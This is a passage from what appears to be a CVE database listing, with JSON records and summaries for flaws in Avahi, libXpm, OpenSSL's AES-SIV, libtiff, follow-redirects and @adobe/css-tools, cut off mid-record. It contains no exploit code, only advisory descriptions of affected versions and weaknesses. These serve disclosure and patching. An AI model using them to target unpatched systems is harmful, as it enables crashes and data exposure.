---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | n/a | avahi | |||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T17:39:13.632Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38472" }, { "name": "RHBZ#2191692", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191692" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-38472", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T13:55:06.065680Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:17:10.800Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "avahi", "vendor": "n/a" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "avahi", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "avahi", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" }, { "collectionURL": "https://packages.fedoraproject.org/", "defaultStatus": "affected", "packageName": "avahi", "product": "Fedora", "vendor": "Fedora" } ], "datePublic": "2023-04-26T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Avahi. A reachable assertion exists in the avahi_rdata_parse() function." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-617", "description": "Reachable Assertion", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-02T14:59:24.996Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-38472" }, { "name": "RHBZ#2191692", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2191692" } ], "timeline": [ { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-04-26T00:00:00+00:00", "value": "Made public." } ], "title": "Reachable assertion in avahi_rdata_parse", "x_redhatCweChain": "CWE-617: Reachable Assertion" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-38472", "datePublished": "2023-11-02T14:59:24.996Z", "dateReserved": "2023-07-18T09:48:04.753Z", "dateUpdated": "2024-08-29T14:17:10.800Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-43789
Vulnerability from cvelistv5
Published
2023-10-12 11:43
Modified
2024-11-23 02:03
Severity ?
EPSS score ?
Summary
A vulnerability was found in libXpm where a vulnerability exists due to a boundary condition, a local user can trigger an out-of-bounds read error and read contents of memory on the system.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2146 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2217 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2974 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:3022 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-43789 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2242249 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 0 ≤ |
||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T19:52:11.025Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2146", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2146" }, { "name": "RHSA-2024:2217", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2217" }, { "name": "RHSA-2024:2974", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2974" }, { "name": "RHSA-2024:3022", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:3022" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43789" }, { "name": "RHBZ#2242249", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242249" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/63IBRFLQVZSMOAZBZOBKFWJP26ILRAGQ/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3KFUQT42R7TB4D7RISNSBQFJGLTQGUL/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TFAJTBNO3PAIA6EGZR4PN62H6RLKNDTE/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZECBCLDYUGLDSVV75ECPIBW7JXOB3747/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.freedesktop.org/xorg/lib/libxpm", "defaultStatus": "unaffected", "packageName": "libXpm", "versions": [ { "lessThan": "3.5.17", "status": "affected", "version": "0", "versionType": "semver" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.5.12-11.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "motif", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.3.4-20.el8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.5.13-10.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "motif", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:2.3.4-28.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libXpm", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "motif", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" } ], "datePublic": "2023-10-04T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A vulnerability was found in libXpm where a vulnerability exists due to a boundary condition, a local user can trigger an out-of-bounds read error and read contents of memory on the system." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "Out-of-bounds Read", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T02:03:19.871Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2146", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2146" }, { "name": "RHSA-2024:2217", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2217" }, { "name": "RHSA-2024:2974", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2974" }, { "name": "RHSA-2024:3022", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:3022" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-43789" }, { "name": "RHBZ#2242249", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2242249" } ], "timeline": [ { "lang": "en", "time": "2023-10-05T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-10-04T00:00:00+00:00", "value": "Made public." } ], "title": "Libxpm: out of bounds read on xpm with corrupted colormap", "x_redhatCweChain": "CWE-125: Out-of-bounds Read" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-43789", "datePublished": "2023-10-12T11:43:20.009Z", "dateReserved": "2023-09-22T09:52:31.109Z", "dateUpdated": "2024-11-23T02:03:19.871Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-2975
Vulnerability from cvelistv5
Published
2023-07-14 11:16
Modified
2024-10-14 14:55
Severity ?
EPSS score ?
Summary
Issue summary: The AES-SIV cipher implementation contains a bug that causes
it to ignore empty associated data entries which are unauthenticated as
a consequence.
Impact summary: Applications that use the AES-SIV algorithm and want to
authenticate empty data entries as associated data can be misled by removing,
adding or reordering such empty entries as these are ignored by the OpenSSL
implementation. We are currently unaware of any such applications.
The AES-SIV algorithm allows for authentication of multiple associated
data entries along with the encryption. To authenticate empty data the
application has to call EVP_EncryptUpdate() (or EVP_CipherUpdate()) with
NULL pointer as the output buffer and 0 as the input buffer length.
The AES-SIV implementation in OpenSSL just returns success for such a call
instead of performing the associated data authentication operation.
The empty data thus will not be authenticated.
As this issue does not affect non-empty associated data authentication and
we expect it to be rare for an application to use empty associated data
entries this is qualified as Low severity issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T06:41:04.070Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20230714.txt" }, { "name": "3.1.2 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a83f0c958811f07e0d11dfc6b5a6a98edfd5bdc" }, { "name": "3.0.10 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=00e2f5eea29994d19293ec4e8c8775ba73678598" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/15/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2023/07/19/5" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230725-0004/" }, { "tags": [ "x_transferred" ], "url": "https://security.gentoo.org/glsa/202402-08" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.1.2", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.10", "status": "affected", "version": "3.0.0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "reporter", "user": "00000000-0000-4000-9000-000000000000", "value": "Juerg Wullschleger (Google)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Tomas Mraz" } ], "datePublic": "2023-07-07T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Issue summary: The AES-SIV cipher implementation contains a bug that causes\u003cbr\u003eit to ignore empty associated data entries which are unauthenticated as\u003cbr\u003ea consequence.\u003cbr\u003e\u003cbr\u003eImpact summary: Applications that use the AES-SIV algorithm and want to\u003cbr\u003eauthenticate empty data entries as associated data can be misled by removing,\u003cbr\u003eadding or reordering such empty entries as these are ignored by the OpenSSL\u003cbr\u003eimplementation. We are currently unaware of any such applications.\u003cbr\u003e\u003cbr\u003eThe AES-SIV algorithm allows for authentication of multiple associated\u003cbr\u003edata entries along with the encryption. To authenticate empty data the\u003cbr\u003eapplication has to call EVP_EncryptUpdate() (or EVP_CipherUpdate()) with\u003cbr\u003eNULL pointer as the output buffer and 0 as the input buffer length.\u003cbr\u003eThe AES-SIV implementation in OpenSSL just returns success for such a call\u003cbr\u003einstead of performing the associated data authentication operation.\u003cbr\u003eThe empty data thus will not be authenticated.\u003cbr\u003e\u003cbr\u003eAs this issue does not affect non-empty associated data authentication and\u003cbr\u003ewe expect it to be rare for an application to use empty associated data\u003cbr\u003eentries this is qualified as Low severity issue." } ], "value": "Issue summary: The AES-SIV cipher implementation contains a bug that causes\nit to ignore empty associated data entries which are unauthenticated as\na consequence.\n\nImpact summary: Applications that use the AES-SIV algorithm and want to\nauthenticate empty data entries as associated data can be misled by removing,\nadding or reordering such empty entries as these are ignored by the OpenSSL\nimplementation. We are currently unaware of any such applications.\n\nThe AES-SIV algorithm allows for authentication of multiple associated\ndata entries along with the encryption. To authenticate empty data the\napplication has to call EVP_EncryptUpdate() (or EVP_CipherUpdate()) with\nNULL pointer as the output buffer and 0 as the input buffer length.\nThe AES-SIV implementation in OpenSSL just returns success for such a call\ninstead of performing the associated data authentication operation.\nThe empty data thus will not be authenticated.\n\nAs this issue does not affect non-empty associated data authentication and\nwe expect it to be rare for an application to use empty associated data\nentries this is qualified as Low severity issue." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-354", "description": "CWE-354 Improper Validation of Integrity Check Value", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-14T14:55:45.748Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20230714.txt" }, { "name": "3.1.2 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a83f0c958811f07e0d11dfc6b5a6a98edfd5bdc" }, { "name": "3.0.10 git commit", "tags": [ "patch" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=00e2f5eea29994d19293ec4e8c8775ba73678598" } ], "source": { "discovery": "UNKNOWN" }, "title": "AES-SIV implementation ignores empty associated data entries", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2023-2975", "datePublished": "2023-07-14T11:16:25.151Z", "dateReserved": "2023-05-30T10:29:34.539Z", "dateUpdated": "2024-10-14T14:55:45.748Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6228
Vulnerability from cvelistv5
Published
2023-12-18 13:43
Modified
2024-12-18 15:14
Severity ?
EPSS score ?
Summary
An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2289 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:5079 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6228 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2240995 | issue-tracking, x_refsource_REDHAT |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 8 |
Unaffected: 0:4.0.9-32.el8_10 < * cpe:/a:redhat:enterprise_linux:8::crb cpe:/a:redhat:enterprise_linux:8::appstream |
||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:21:17.893Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2289", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2289" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6228" }, { "name": "RHBZ#2240995", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240995" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::crb", "cpe:/a:redhat:enterprise_linux:8::appstream" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.0.9-32.el8_10", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.4.0-12.el9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "compat-libtiff3", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "libtiff", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "affected", "packageName": "compat-libtiff3", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" } ], "datePublic": "2023-09-07T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Low" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-787", "description": "Out-of-bounds Write", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-12-18T15:14:30.405Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2289", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2289" }, { "name": "RHSA-2024:5079", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:5079" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6228" }, { "name": "RHBZ#2240995", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2240995" } ], "timeline": [ { "lang": "en", "time": "2023-09-27T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-09-07T00:00:00+00:00", "value": "Made public." } ], "title": "Libtiff: heap-based buffer overflow in cpstriptotile() in tools/tiffcp.c", "x_redhatCweChain": "CWE-787: Out-of-bounds Write" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6228", "datePublished": "2023-12-18T13:43:08.775Z", "dateReserved": "2023-11-21T05:33:19.718Z", "dateUpdated": "2024-12-18T15:14:30.405Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-26159
Vulnerability from cvelistv5
Published
2024-01-02 05:00
Modified
2024-08-02 11:39
Severity ?
EPSS score ?
Summary
Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | follow-redirects |
Version: 0 ≤ |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T11:39:06.643Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://security.snyk.io/vuln/SNYK-JS-FOLLOWREDIRECTS-6141137" }, { "tags": [ "x_transferred" ], "url": "https://github.com/follow-redirects/follow-redirects/issues/235" }, { "tags": [ "x_transferred" ], "url": "https://github.com/follow-redirects/follow-redirects/pull/236" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZZ425BFKNBQ6AK7I5SAM56TWON5OF2XM/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "follow-redirects", "vendor": "n/a", "versions": [ { "lessThan": "1.15.4", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "Kim Donggyu" } ], "descriptions": [ { "lang": "en", "value": "Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "Improper Input Validation", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-02T05:00:00.659Z", "orgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730", "shortName": "snyk" }, "references": [ { "url": "https://security.snyk.io/vuln/SNYK-JS-FOLLOWREDIRECTS-6141137" }, { "url": "https://github.com/follow-redirects/follow-redirects/issues/235" }, { "url": "https://github.com/follow-redirects/follow-redirects/pull/236" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZZ425BFKNBQ6AK7I5SAM56TWON5OF2XM/" } ] } }, "cveMetadata": { "assignerOrgId": "bae035ff-b466-4ff4-94d0-fc9efd9e1730", "assignerShortName": "snyk", "cveId": "CVE-2023-26159", "datePublished": "2024-01-02T05:00:00.659Z", "dateReserved": "2023-02-20T10:28:48.931Z", "dateUpdated": "2024-08-02T11:39:06.643Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-48631
Vulnerability from cvelistv5
Published
2023-12-14 13:09
Modified
2024-08-02 21:37
Severity ?
EPSS score ?
Summary
@adobe/css-tools versions 4.3.1 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS.
References
▼ | URL | Tags |
---|---|---|
https://github.com/adobe/css-tools/security/advisories/GHSA-prr3-c3m5-p7q2 | vendor-advisory |
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | Adobe | Not a product |
Version: 0 ≤ 4.3.1 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T21:37:53.427Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://github.com/adobe/css-tools/security/advisories/GHSA-prr3-c3m5-p7q2" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "affected", "product": "Not a product", "vendor": "Adobe", "versions": [ { "lessThanOrEqual": "4.3.1", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "datePublic": "2023-12-12T17:00:00.000Z", "descriptions": [ { "lang": "en", "value": "@adobe/css-tools versions 4.3.1 and earlier are affected by an Improper Input Validation vulnerability that could result in a denial of service while attempting to parse CSS." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "confidentialityRequirement": "NOT_DEFINED", "environmentalScore": 5.3, "environmentalSeverity": "MEDIUM", "exploitCodeMaturity": "NOT_DEFINED", "integrityImpact": "NONE", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "LOW", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "NOT_DEFINED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "remediationLevel": "NOT_DEFINED", "reportConfidence": "NOT_DEFINED", "scope": "UNCHANGED", 